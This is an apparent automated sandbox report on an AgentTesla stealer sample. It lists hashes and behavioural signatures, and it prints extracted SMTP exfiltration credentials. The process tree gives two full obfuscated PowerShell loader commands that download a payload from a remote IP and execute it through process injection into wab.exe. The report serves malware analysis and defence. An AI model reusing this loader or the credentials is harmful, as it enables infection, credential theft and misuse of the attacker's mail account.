agenttesla | aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf

General

Target

aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf.bat
Size

7KB
MD5

9eb9ec107cbbbb33b41d9df263eb0547
SHA1

9f4098053112c864b75d3d22a647a63fbcb00db5
SHA256

aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf
SHA512

361706ca0f0af6c28e29c82fa2db3a33cda075f7fa2220a0f32a0e080bd8a2cc424aa77e9ca73667ecd696858ba974d1172e153d7e018e0107fe3c1b18c4c127
SSDEEP

192:KjYxSFV4/jJSi0JJ1e816YEz/QoTE1onTUDaBo3NNTDYGS5n:KjKSF6/jJ3wR6Y8QoTE16I+Bo3NtDTu

Score

10^/10

agenttesla keylogger spyware stealer trojan

Malware Config

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.controlfire.com.mx
Port:
587
Username:
[email protected]
Password:
+DI9CNZM&Y%W
Email To:
[email protected]

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

7 4732 powershell.exe
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

62 ip-api.com
Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs

Processes:

wab.exe

pid process

680 wab.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs

Processes:

powershell.exewab.exe

pid process

1532 powershell.exe
680 wab.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 1532 set thread context of 680 1532 powershell.exe wab.exe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exewab.exe

pid process

4732 powershell.exe
4732 powershell.exe
1532 powershell.exe
1532 powershell.exe
1532 powershell.exe
1532 powershell.exe
680 wab.exe
680 wab.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

powershell.exe

pid process

1532 powershell.exe
Suspicious use of AdjustPrivilegeToken 3 IoCs

Processes:

powershell.exepowershell.exewab.exe

description pid process

Token: SeDebugPrivilege 4732 powershell.exe
Token: SeDebugPrivilege 1532 powershell.exe
Token: SeDebugPrivilege 680 wab.exe

flow	pid	process
7	4732	powershell.exe

flow	ioc
62	ip-api.com

pid	process
680	wab.exe

pid	process
1532	powershell.exe
680	wab.exe

description	pid	process	target process
PID 1532 set thread context of 680	1532	powershell.exe	wab.exe

pid	process
4732	powershell.exe
4732	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
1532	powershell.exe
680	wab.exe
680	wab.exe

pid	process
1532	powershell.exe

description	pid	process
Token: SeDebugPrivilege	4732	powershell.exe
Token: SeDebugPrivilege	1532	powershell.exe
Token: SeDebugPrivilege	680	wab.exe

Suspicious use of WriteProcessMemory 15 IoCs

Processes:

cmd.exepowershell.exepowershell.exe

description	pid	process	target process
PID 2252 wrote to memory of 4732	2252	cmd.exe	powershell.exe
PID 2252 wrote to memory of 4732	2252	cmd.exe	powershell.exe
PID 4732 wrote to memory of 3216	4732	powershell.exe	cmd.exe
PID 4732 wrote to memory of 3216	4732	powershell.exe	cmd.exe
PID 4732 wrote to memory of 1532	4732	powershell.exe	powershell.exe
PID 4732 wrote to memory of 1532	4732	powershell.exe	powershell.exe
PID 4732 wrote to memory of 1532	4732	powershell.exe	powershell.exe
PID 1532 wrote to memory of 3332	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 3332	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 3332	1532	powershell.exe	cmd.exe
PID 1532 wrote to memory of 680	1532	powershell.exe	wab.exe
PID 1532 wrote to memory of 680	1532	powershell.exe	wab.exe
PID 1532 wrote to memory of 680	1532	powershell.exe	wab.exe
PID 1532 wrote to memory of 680	1532	powershell.exe	wab.exe
PID 1532 wrote to memory of 680	1532	powershell.exe	wab.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aa42e8496ced596dfc972f148bb41a5f31e344921c875ce83a4e449dcf3974bf.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2252

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -windowstyle hidden "$Conjee = 1;$Sknhedsaabenbaringen='Substrin';$Sknhedsaabenbaringen+='g';Function Indisturbable($Antigenernes){$Stemmeberettigede=$Antigenernes.Length-$Conjee;For($Fodboldspillerens=5; $Fodboldspillerens -lt $Stemmeberettigede; $Fodboldspillerens+=(6)){$Noneviction+=$Antigenernes.$Sknhedsaabenbaringen.Invoke($Fodboldspillerens, $Conjee);}$Noneviction;}function Wharfie($Breddesekundets){.($Funktionssymboler) ($Breddesekundets);}$Gravsten=Indisturbable 'AflbsMBuddyoSpindzSp.ffiDihydl Drp.lUmedgaExtra/Leves5Skibs.Pathe0Konto Gaard(AleurW Untri ,lbinoutjedSporio Alo,w.espesBehav MilliNChromTSmals Unawa1 High0Gluon.Bragg0worst;Progn VoksbW lrei NidknDesti6Ja,ey4Bssel;Forsv Nsk bxPropp6Kibit4 Zygo;Reefi Vagtsr GyrovDiabo:casta1 T,ss2 F,rt1Banta.be.bu0Natur).tora Deli.GCeiboePre ecTidspk PlanoDigte/Praes2Unjoy0Jalou1P cif0Pheno0Vil.t1Irate0Skrav1Upaaa DemolFMil.ii In.rrMisc.e,odlef Krymo UndexS,nta/,ndos1Scrai2Nonco1Breds.s.orm0Ka.fe ';$aktuarerne=Indisturbable 'BjartU usins,laireMargirPalul-me.vrAH ddygGro,neAbsc.n uroptD.awb ';$Modning91=Indisturbable 'Afl dhR.flet Int tPatagp Demo: Oprr/Gener/Nonca2Morti3 C,ns. Blac9Uns a5Corre. Hjem6Deva 0Nonli. Pale7.lcad7hypon/U.mnsD ButiaForsytWagg aPrin,iLandsn.hantdUdradsBus,eaOutpum Rd.llInteriYn lenTh,rdg ammes BestmInspeeG.nnetH,lvtoCrinidMuskeeFrees.F,nesa KullaSlummfLeew ';$Overvurderingen=Indisturbable 'Tamdy>d,gsr ';$Funktionssymboler=Indisturbable 'Farvei PhoteI.orhx B.ch ';$Sammenskudsgildet='spareknivenes';Wharfie (Indisturbable 'GiveySCharie Ydertvrd,f-i dagCGast.oD rthn.andetNdsteeCafe n BurktFunkt In,d-Redn.PInartaTr,nstInco,hDataf RedakTEs im:Glyce\ PredTBrordoKitterRabuldFrmaneAfkrinBef,lsCentrkEthery Tm.el OmtalNew peHymnarKnudensp rre Fort.Sk,altPaalgxM ljvtDoubl Neu.o-UnconVKobleanonrelLandsu PartePerip Snake$IsogaSmatuta AdelmCert.mGlaskeTravenEqui,sAvadak Ans,uBr vidLednisStrafgskandiR.umblSublidCcitteEddistkrepl;Brand ');Wharfie (Indisturbable ' Polii Udvif R is Sibe.(,utint sbeeI.dbus mnintKlang- PrefpAvlstaSids tBerryhBrand PertaTHa.va:Nicam\T phaT AndeoDilkerHjtlydUn ilethw cnBuzzasGavnekTransybeli.lKompllDistreDida.r,onscn .kemebeskr.MiractAuto xUndistSoftw)J.rnb{sceneeBlodbxMoneyiTotr,t Afte}domsf; Fora ');$Kvantumsrabattens = Indisturbable 'BaadeeNedbrcReb bhSapheoBaham Afgha%Run,iaKongepRidsnpMidded daggabuzzatBronka,fsin%Unbar\ CopaWVaadeeDannesDecamtDampnf FarvaPlughlfe.oge arcen utom2Gesti0Ekstr8Can,r.Coun.ULongsnFi romSvmme Saun&Afplu&Misse Skurke.irmacOvervhFolkeo anni Desig$Trian ';Wharfie (Indisturbable ' Lath$Tekstg Gudml T,ffo Uoplb Bal.aSatsalEjend: nrivSH,etooRoc.ecLogikiArbejaRefrilGeddeiDefecsRaaheaNove,tfl.nti Mesmo .fornMe.ocs .uclpNon irAkvaroAff ocsupereOverjsUnbl.sMod leSublarTr.cenDrjeneBesud5Marmo8Viden=Rehab(Fysi.cPelsfmEn.epdZigza Indav/ Hircc Tabl Omski$TelugKAntibv NoncaPrevenPlankt CommuSq,alm AfsisLi.sir floraDipwab Anala Prentfa ritRak.oesarinn HavmsAchro)Catas ');Wharfie (Indisturbable ' Cand$JunglgfragtlSpoero.abagbJocunaCar.olUnde.:DelgrM.ervei TraclRealii Udbut VldeaAgou.nRenhecKobleiBatteedivers V.ld=,seud$uddatMUnepio.acandmunisnOmkriioutman SupegOve e9Impai1Sn,ck.fummls.elibpPeritlBlomkiLensgtNynlu(Tel u$subv,ODorsivtroskeEfterrImprivunderuMimrerArbejd Cleaeemissrho.edi Ch,rn Aflagislame U.denCrat )Di is ');$Modning91=$Militancies[0];Wharfie (Indisturbable 'C.men$Ve,ergUpwhil Prs oHyr.nbVermiaRnssnlMaski: InfiCBlge,oForetnMurics K.lltMissirAmbituT,gdkcAmal tThyreoBenzir TurnsCl.ys= ,pexNSul.heUnp rwPedo -Si.naOTh.rsbPetrijOverceKa apccentrtPa,ri WoolwS,olkeyHenstsCalemtCamase evidm Fis,.U gloN ,ackeOev itWards.SetarW,etroeRokkeb opslCEventlBassiiMesope BedfnTomatt Fal ');Wharfie (Indisturbable 'gno.t$R.staCUlnieoHaftonSpor sMetapt Fronr ExsiuIn lsc VaabtTjeneoAubadrVelgrsSpla..GalhoHoverpeSew naAlungdInde.eforgirHavkassalve[ L de$Ov,rra TankkHypert ReseuAntikaPristr Plure.trafrAntienBatiseLrepr]Ufor.=Andie$EkspeG,ennerOrnitaFa eivSydsis S,elt Ethie iltrnAfske ');$Traprocks=Indisturbable 'T.ilzCHovmooSkarrnBar esBa.lttGaflerEk,teuSt.etc lretDisapoBltesr FremsHelli.RepeaDKrapyoTranew .krinbreakl Maino mik,aReingd KernFProbliUdenrlReva ePre r(Newsp$neutrM BinooFli tdNo senGrufuide.egnTrmlkgPales9Pancr1Overs,H mom$WeirdS.onvekvideor HokuaAl amlsubc,dRadieeSemippPsy hoSeel,sPolsteK,ydsrNonemn,afiaeS,jtesMelan)Dknet ';$Traprocks=$Socialisationsprocesserne58[1]+$Traprocks;$Skraldeposernes=$Socialisationsprocesserne58[0];Wharfie (Indisturbable 'Award$libelgZygoul .sykoUproabHepataObserlSabb.:Ba.llHPervae ,rorlkinesa Udkmu,verstOs.edoLupetm fi,sa langtSulphiOver,s S eteTryinrDeeskiSt.mynEsbergBor,l= bser(unmorT ud aeKommusUnnestEns.a-.ikkePP,denaS,mertPointhRocka Subbi$ Un,aSAntinkUnmetrSkydeaBagsilTusm dRev,te DopipAcceloAte.ssGrsenePort rAfs.enCa.ire HavrsT.rme)Flytt ');while (!$Helautomatisering) {Wharfie (Indisturbable ' irke$Rim,lg Winglper,ioSubmibDiploaGammalShi,a:BrontMSyltnoIronirSam ia.acros MatisS eti=Pr,nt$ FlletFors r GinguVa,laeLenti ') ;Wharfie $Traprocks;Wharfie (Indisturbable 'GammaS Dou tAccesaAgendrDuplitMbler- BagbS ainlVelmae CuskeCorecp.roun Pift4N.utr ');Wharfie (Indisturbable 'Slids$ Oc,rgKmpevlCata oNonoub ffacaBevoglReduc:UndetHBefraeArmb lDishuaAfsk.uBa drtWad,yo arromFanmaa S,intEmigriProsasindureFuldfrCitiziUni,nnGrusvgKnubs=Force(tofteT st,keStrygs GruntUdbet-Fart,P ndavaKvalitFanklhSuper Enmit$stopuSU.fudkSlgtsrNivelaProgrlPolyadPreteeFalanp PlukoReunisHandleAlo.irMistonFolkeeJulensSamli)Efter ') ;Wharfie (Indisturbable 'Versl$VillagUnifolIco oo Verab.efenaAutoml S il:M,iopJExp,rgSkov,eGal.crvkkelsVirketHak,suVastiePacifr,eopon PanteCuptusAnapt=.utch$SoppegFem.nlVil,mo PredbChif,a rtsl Unsu:konvee Bitek A,des TilmtO,ersrAfbreaNarkouSmoldd AbsogVe.teiTatarfOutbltPolypeTil,rrV,rke+E ifi+suppl%Korr $RhesuM SiddiLufthlMagnhiDilattPropiaAmphinReallcDetoniTrolle DiatsHeter.SedancChrysoCigaru Deponalo.etImage ') ;$Modning91=$Militancies[$Jgerstuernes];}Wharfie (Indisturbable 'Kasse$SemiogPl,skltrespo sc.sb.arboatensil Mell:RampaS sterk ikieTutuklgau,leTostitKakifoSweatnPletslRejs,iTankfkBrinteLgtni Muscu=Het.r FaddeGb.joue,elintblods-Ba,taCGavekoSup.rngnavet H,ndeBebeenDow,btMinds D,mo$ConvoSOutgokF,rker undiaSvampl Hjn.dI.praeBestrp Ti doAarlis odeeDemokr,mulsnFalseePs.udsD.met ');Wharfie (Indisturbable ' ored$BeduigPlanol Forro TypebGriska,etodlFests:AarsaOCobwerPrajaa RenonDisplg busleEftersHalme Ja n=Ge er C.unt[,uperSUd rkycentrs zoprtErod,e Ca.pm ena.KringCfour,oHaaksnEkspevEnglieFe,skrLottit Bedr]Mal,a:borge: StedF Bagtr Outjo VandmUdfa.BSkummaExtirsMetate .orm6Obduk4ProgrSOverstLimourPseudiBeliinTune gdri.t(Loosi$Kl.riSdogrik.risieUrteglBrol,eGa antBasheoJulekn Utillafm,li HovekGitepekogle)Udsty ');Wharfie (Indisturbable 'Adact$Statig ProslExtrao.oersbNonpeaefterlSmaat: royaRCen.reGues.tCocknrUnderyFourc Apost=Likew Mesos[Forb SAugieyPa.blsqu,nttKondeePr.ham Redi.,zeotTAgnareBomblxA illtbaalp.Unst.EblinknFerric avenoRealldPengei Mor.nJulesgSo.ia]Raadi: Bear:ThygeA RecaSJenniCCordeIStrafI aywa. TresGIod zeForestBred SVermit ,pumrOestriAchronRaa agItera( Taph$DemobOEuroprDebataillusngazetgNeapoeBlafrsForet)Proje ');Wharfie (Indisturbable 'Signa$.allig DistlNedfloPhotobChloraNongal Kera:,edicFEcclerB.ndsypes,osSpiseeYahvep For,u,eagunDekorkInvintDozinsHumicsskgh nNaz rkClavinudtapiforklnChuffgCe,seeHjtberCr,ss=hamot$KampdRAutooeRd.udtWanrer i,meyElect.Ar.hss G,neu ecarbReleis Eg etphthar ,irci onnnunp.sgScr.g(Knude3Tinst0Lupoi1Canti3Brune9 Watt8 Tard,Herb.2soot 7 aerm5 Elim5 Te e8 Jive) Fige ');Wharfie $Frysepunktssnkninger;"
2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4732

C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Westfalen208.Unm && echo $"
3⤵
PID:3216

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Conjee = 1;$Sknhedsaabenbaringen='Substrin';$Sknhedsaabenbaringen+='g';Function Indisturbable($Antigenernes){$Stemmeberettigede=$Antigenernes.Length-$Conjee;For($Fodboldspillerens=5; $Fodboldspillerens -lt $Stemmeberettigede; $Fodboldspillerens+=(6)){$Noneviction+=$Antigenernes.$Sknhedsaabenbaringen.Invoke($Fodboldspillerens, $Conjee);}$Noneviction;}function Wharfie($Breddesekundets){.($Funktionssymboler) ($Breddesekundets);}$Gravsten=Indisturbable 'AflbsMBuddyoSpindzSp.ffiDihydl Drp.lUmedgaExtra/Leves5Skibs.Pathe0Konto Gaard(AleurW Untri ,lbinoutjedSporio Alo,w.espesBehav MilliNChromTSmals Unawa1 High0Gluon.Bragg0worst;Progn VoksbW lrei NidknDesti6Ja,ey4Bssel;Forsv Nsk bxPropp6Kibit4 Zygo;Reefi Vagtsr GyrovDiabo:casta1 T,ss2 F,rt1Banta.be.bu0Natur).tora Deli.GCeiboePre ecTidspk PlanoDigte/Praes2Unjoy0Jalou1P cif0Pheno0Vil.t1Irate0Skrav1Upaaa DemolFMil.ii In.rrMisc.e,odlef Krymo UndexS,nta/,ndos1Scrai2Nonco1Breds.s.orm0Ka.fe ';$aktuarerne=Indisturbable 'BjartU usins,laireMargirPalul-me.vrAH ddygGro,neAbsc.n uroptD.awb ';$Modning91=Indisturbable 'Afl dhR.flet Int tPatagp Demo: Oprr/Gener/Nonca2Morti3 C,ns. Blac9Uns a5Corre. Hjem6Deva 0Nonli. Pale7.lcad7hypon/U.mnsD ButiaForsytWagg aPrin,iLandsn.hantdUdradsBus,eaOutpum Rd.llInteriYn lenTh,rdg ammes BestmInspeeG.nnetH,lvtoCrinidMuskeeFrees.F,nesa KullaSlummfLeew ';$Overvurderingen=Indisturbable 'Tamdy>d,gsr ';$Funktionssymboler=Indisturbable 'Farvei PhoteI.orhx B.ch ';$Sammenskudsgildet='spareknivenes';Wharfie (Indisturbable 'GiveySCharie Ydertvrd,f-i dagCGast.oD rthn.andetNdsteeCafe n BurktFunkt In,d-Redn.PInartaTr,nstInco,hDataf RedakTEs im:Glyce\ PredTBrordoKitterRabuldFrmaneAfkrinBef,lsCentrkEthery Tm.el OmtalNew peHymnarKnudensp rre Fort.Sk,altPaalgxM ljvtDoubl Neu.o-UnconVKobleanonrelLandsu PartePerip Snake$IsogaSmatuta AdelmCert.mGlaskeTravenEqui,sAvadak Ans,uBr vidLednisStrafgskandiR.umblSublidCcitteEddistkrepl;Brand ');Wharfie (Indisturbable ' Polii Udvif R is Sibe.(,utint sbeeI.dbus mnintKlang- PrefpAvlstaSids tBerryhBrand PertaTHa.va:Nicam\T phaT AndeoDilkerHjtlydUn ilethw cnBuzzasGavnekTransybeli.lKompllDistreDida.r,onscn .kemebeskr.MiractAuto xUndistSoftw)J.rnb{sceneeBlodbxMoneyiTotr,t Afte}domsf; Fora ');$Kvantumsrabattens = Indisturbable 'BaadeeNedbrcReb bhSapheoBaham Afgha%Run,iaKongepRidsnpMidded daggabuzzatBronka,fsin%Unbar\ CopaWVaadeeDannesDecamtDampnf FarvaPlughlfe.oge arcen utom2Gesti0Ekstr8Can,r.Coun.ULongsnFi romSvmme Saun&Afplu&Misse Skurke.irmacOvervhFolkeo anni Desig$Trian ';Wharfie (Indisturbable ' Lath$Tekstg Gudml T,ffo Uoplb Bal.aSatsalEjend: nrivSH,etooRoc.ecLogikiArbejaRefrilGeddeiDefecsRaaheaNove,tfl.nti Mesmo .fornMe.ocs .uclpNon irAkvaroAff ocsupereOverjsUnbl.sMod leSublarTr.cenDrjeneBesud5Marmo8Viden=Rehab(Fysi.cPelsfmEn.epdZigza Indav/ Hircc Tabl Omski$TelugKAntibv NoncaPrevenPlankt CommuSq,alm AfsisLi.sir floraDipwab Anala Prentfa ritRak.oesarinn HavmsAchro)Catas ');Wharfie (Indisturbable ' Cand$JunglgfragtlSpoero.abagbJocunaCar.olUnde.:DelgrM.ervei TraclRealii Udbut VldeaAgou.nRenhecKobleiBatteedivers V.ld=,seud$uddatMUnepio.acandmunisnOmkriioutman SupegOve e9Impai1Sn,ck.fummls.elibpPeritlBlomkiLensgtNynlu(Tel u$subv,ODorsivtroskeEfterrImprivunderuMimrerArbejd Cleaeemissrho.edi Ch,rn Aflagislame U.denCrat )Di is ');$Modning91=$Militancies[0];Wharfie (Indisturbable 'C.men$Ve,ergUpwhil Prs oHyr.nbVermiaRnssnlMaski: InfiCBlge,oForetnMurics K.lltMissirAmbituT,gdkcAmal tThyreoBenzir TurnsCl.ys= ,pexNSul.heUnp rwPedo -Si.naOTh.rsbPetrijOverceKa apccentrtPa,ri WoolwS,olkeyHenstsCalemtCamase evidm Fis,.U gloN ,ackeOev itWards.SetarW,etroeRokkeb opslCEventlBassiiMesope BedfnTomatt Fal ');Wharfie (Indisturbable 'gno.t$R.staCUlnieoHaftonSpor sMetapt Fronr ExsiuIn lsc VaabtTjeneoAubadrVelgrsSpla..GalhoHoverpeSew naAlungdInde.eforgirHavkassalve[ L de$Ov,rra TankkHypert ReseuAntikaPristr Plure.trafrAntienBatiseLrepr]Ufor.=Andie$EkspeG,ennerOrnitaFa eivSydsis S,elt Ethie iltrnAfske ');$Traprocks=Indisturbable 'T.ilzCHovmooSkarrnBar esBa.lttGaflerEk,teuSt.etc lretDisapoBltesr FremsHelli.RepeaDKrapyoTranew .krinbreakl Maino mik,aReingd KernFProbliUdenrlReva ePre r(Newsp$neutrM BinooFli tdNo senGrufuide.egnTrmlkgPales9Pancr1Overs,H mom$WeirdS.onvekvideor HokuaAl amlsubc,dRadieeSemippPsy hoSeel,sPolsteK,ydsrNonemn,afiaeS,jtesMelan)Dknet ';$Traprocks=$Socialisationsprocesserne58[1]+$Traprocks;$Skraldeposernes=$Socialisationsprocesserne58[0];Wharfie (Indisturbable 'Award$libelgZygoul .sykoUproabHepataObserlSabb.:Ba.llHPervae ,rorlkinesa Udkmu,verstOs.edoLupetm fi,sa langtSulphiOver,s S eteTryinrDeeskiSt.mynEsbergBor,l= bser(unmorT ud aeKommusUnnestEns.a-.ikkePP,denaS,mertPointhRocka Subbi$ Un,aSAntinkUnmetrSkydeaBagsilTusm dRev,te DopipAcceloAte.ssGrsenePort rAfs.enCa.ire HavrsT.rme)Flytt ');while (!$Helautomatisering) {Wharfie (Indisturbable ' irke$Rim,lg Winglper,ioSubmibDiploaGammalShi,a:BrontMSyltnoIronirSam ia.acros MatisS eti=Pr,nt$ FlletFors r GinguVa,laeLenti ') ;Wharfie $Traprocks;Wharfie (Indisturbable 'GammaS Dou tAccesaAgendrDuplitMbler- BagbS ainlVelmae CuskeCorecp.roun Pift4N.utr ');Wharfie (Indisturbable 'Slids$ Oc,rgKmpevlCata oNonoub ffacaBevoglReduc:UndetHBefraeArmb lDishuaAfsk.uBa drtWad,yo arromFanmaa S,intEmigriProsasindureFuldfrCitiziUni,nnGrusvgKnubs=Force(tofteT st,keStrygs GruntUdbet-Fart,P ndavaKvalitFanklhSuper Enmit$stopuSU.fudkSlgtsrNivelaProgrlPolyadPreteeFalanp PlukoReunisHandleAlo.irMistonFolkeeJulensSamli)Efter ') ;Wharfie (Indisturbable 'Versl$VillagUnifolIco oo Verab.efenaAutoml S il:M,iopJExp,rgSkov,eGal.crvkkelsVirketHak,suVastiePacifr,eopon PanteCuptusAnapt=.utch$SoppegFem.nlVil,mo PredbChif,a rtsl Unsu:konvee Bitek A,des TilmtO,ersrAfbreaNarkouSmoldd AbsogVe.teiTatarfOutbltPolypeTil,rrV,rke+E ifi+suppl%Korr $RhesuM SiddiLufthlMagnhiDilattPropiaAmphinReallcDetoniTrolle DiatsHeter.SedancChrysoCigaru Deponalo.etImage ') ;$Modning91=$Militancies[$Jgerstuernes];}Wharfie (Indisturbable 'Kasse$SemiogPl,skltrespo sc.sb.arboatensil Mell:RampaS sterk ikieTutuklgau,leTostitKakifoSweatnPletslRejs,iTankfkBrinteLgtni Muscu=Het.r FaddeGb.joue,elintblods-Ba,taCGavekoSup.rngnavet H,ndeBebeenDow,btMinds D,mo$ConvoSOutgokF,rker undiaSvampl Hjn.dI.praeBestrp Ti doAarlis odeeDemokr,mulsnFalseePs.udsD.met ');Wharfie (Indisturbable ' ored$BeduigPlanol Forro TypebGriska,etodlFests:AarsaOCobwerPrajaa RenonDisplg busleEftersHalme Ja n=Ge er C.unt[,uperSUd rkycentrs zoprtErod,e Ca.pm ena.KringCfour,oHaaksnEkspevEnglieFe,skrLottit Bedr]Mal,a:borge: StedF Bagtr Outjo VandmUdfa.BSkummaExtirsMetate .orm6Obduk4ProgrSOverstLimourPseudiBeliinTune gdri.t(Loosi$Kl.riSdogrik.risieUrteglBrol,eGa antBasheoJulekn Utillafm,li HovekGitepekogle)Udsty ');Wharfie (Indisturbable 'Adact$Statig ProslExtrao.oersbNonpeaefterlSmaat: royaRCen.reGues.tCocknrUnderyFourc Apost=Likew Mesos[Forb SAugieyPa.blsqu,nttKondeePr.ham Redi.,zeotTAgnareBomblxA illtbaalp.Unst.EblinknFerric avenoRealldPengei Mor.nJulesgSo.ia]Raadi: Bear:ThygeA RecaSJenniCCordeIStrafI aywa. TresGIod zeForestBred SVermit ,pumrOestriAchronRaa agItera( Taph$DemobOEuroprDebataillusngazetgNeapoeBlafrsForet)Proje ');Wharfie (Indisturbable 'Signa$.allig DistlNedfloPhotobChloraNongal Kera:,edicFEcclerB.ndsypes,osSpiseeYahvep For,u,eagunDekorkInvintDozinsHumicsskgh nNaz rkClavinudtapiforklnChuffgCe,seeHjtberCr,ss=hamot$KampdRAutooeRd.udtWanrer i,meyElect.Ar.hss G,neu ecarbReleis Eg etphthar ,irci onnnunp.sgScr.g(Knude3Tinst0Lupoi1Canti3Brune9 Watt8 Tard,Herb.2soot 7 aerm5 Elim5 Te e8 Jive) Fige ');Wharfie $Frysepunktssnkninger;"
3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1532

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Westfalen208.Unm && echo $"
4⤵
PID:3332

C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
4⤵
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2280,i,4114443225282860369,4764091921472631035,262144 --variations-seed-version /prefetch:8
1⤵
PID:2888

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xuzki4fr.ul5.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Roaming\Westfalen208.Unm
Filesize
428KB

MD5
77733e60a9ec3270f4fdacc26cf3805d

SHA1
35c315d79017697b468ad75a278aa119a5e61d18

SHA256
b7e4ff4bb3dc96ffc83515a63fe5180b7ca6a5abb102a4dea75555ac05985382

SHA512
0dcd1b4c2f25eb54a5f090add29f44cfa2fac775cf0efa4f102e67a3a68ded1a72f1e7ccab2379bd81072711446a989d0af4a7fef6fdba502b72ad50276127d7

Download Submit
memory/680-64-0x00000000241E0000-0x00000000241F0000-memory.dmp

Filesize
64KB

Download
memory/680-63-0x0000000000E60000-0x0000000000EA2000-memory.dmp

Filesize
264KB

Download
memory/680-62-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/680-60-0x0000000077551000-0x0000000077671000-memory.dmp

Filesize
1.1MB

Download
memory/680-59-0x0000000000E60000-0x00000000020B4000-memory.dmp

Filesize
18.3MB

Download
memory/680-58-0x0000000000E60000-0x00000000020B4000-memory.dmp

Filesize
18.3MB

Download
memory/680-57-0x0000000077551000-0x0000000077671000-memory.dmp

Filesize
1.1MB

Download
memory/680-56-0x00000000775D8000-0x00000000775D9000-memory.dmp

Filesize
4KB

Download
memory/1532-41-0x0000000008130000-0x00000000087AA000-memory.dmp

Filesize
6.5MB

Download
memory/1532-22-0x0000000002F10000-0x0000000002F46000-memory.dmp

Filesize
216KB

Download
memory/1532-24-0x0000000005B00000-0x0000000006128000-memory.dmp

Filesize
6.2MB

Download
memory/1532-25-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/1532-26-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/1532-29-0x0000000006210000-0x0000000006276000-memory.dmp

Filesize
408KB

Download
memory/1532-33-0x0000000006280000-0x00000000065D4000-memory.dmp

Filesize
3.3MB

Download
memory/1532-38-0x00000000055F0000-0x000000000560E000-memory.dmp

Filesize
120KB

Download
memory/1532-39-0x0000000006970000-0x00000000069BC000-memory.dmp

Filesize
304KB

Download
memory/1532-40-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/1532-61-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/1532-42-0x0000000006E60000-0x0000000006E7A000-memory.dmp

Filesize
104KB

Download
memory/1532-43-0x0000000007B80000-0x0000000007C16000-memory.dmp

Filesize
600KB

Download
memory/1532-44-0x0000000006900000-0x0000000006922000-memory.dmp

Filesize
136KB

Download
memory/1532-45-0x0000000008D60000-0x0000000009304000-memory.dmp

Filesize
5.6MB

Download
memory/1532-23-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/1532-47-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/1532-50-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/1532-51-0x0000000007EA0000-0x0000000007EA1000-memory.dmp

Filesize
4KB

Download
memory/1532-52-0x0000000009310000-0x000000000D6CE000-memory.dmp

Filesize
67.7MB

Download
memory/1532-54-0x00000000054C0000-0x00000000054D0000-memory.dmp

Filesize
64KB

Download
memory/1532-55-0x0000000077551000-0x0000000077671000-memory.dmp

Filesize
1.1MB

Download
memory/1532-21-0x0000000074B30000-0x00000000752E0000-memory.dmp

Filesize
7.7MB

Download
memory/4732-18-0x000002D9BD0B0000-0x000002D9BD0C0000-memory.dmp

